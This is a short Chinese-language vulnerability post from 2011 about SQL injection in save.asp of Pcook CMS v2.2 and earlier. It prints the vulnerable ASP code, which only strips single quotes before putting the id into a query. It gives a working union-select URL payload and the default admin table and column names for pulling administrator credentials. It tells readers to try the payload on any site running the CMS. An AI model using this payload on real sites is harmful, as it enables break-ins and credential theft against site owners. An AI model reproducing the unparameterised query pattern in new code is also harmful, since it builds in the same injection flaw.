漏洞标题:Pcook CMS 文章管理系统 v2.2 以及以下版本的注入漏洞
影响程序:Pcook CMS 文章管理系统 v2.2 以及以下版本
下载地址:http://down.chinaz.com/soft/23761.htm
漏洞文件:save.asp,hits.asp
save.asp 代码:
<!--#include file="Inc/conn.asp"-->
<%
Dim id
Dim Rs,Sql
id = Replace(Trim(Request.QueryString("id")),"'","")
If Session("id"&id)<>"" Then
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
Response.Write("NoData")
Else
Response.Write("Dig")
Response.Write(",")
Response.Write(Rs("Dig"))
End If
Else
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
Response.Write("NoData")
Else
Dim Dig
Dig =Rs("Dig")
Dig = Dig + 1
Rs("Dig") = Dig
Rs.Update
Rs.Close
Set Rs = Nothing
Session("id"&id) = id
Response.Write(Dig)
End If
End If
%> |
过滤不全,直接可以利用。
随便找篇文章,链接如:list.asp?id=1341,把 list.asp 改为 save.asp 就可以了,如下:
save.asp?id=1341%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin_name,16,17,18,19,20,21%20from%20pcook_admin
有的也许是19个字段,刚刚就有遇到过。
默认表名:pcook_admin
默认字段表:admin_name,admin_pass
然后该干嘛干嘛去……
文章作者
Nuclear'Atk
上次更新
2011-02-12
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。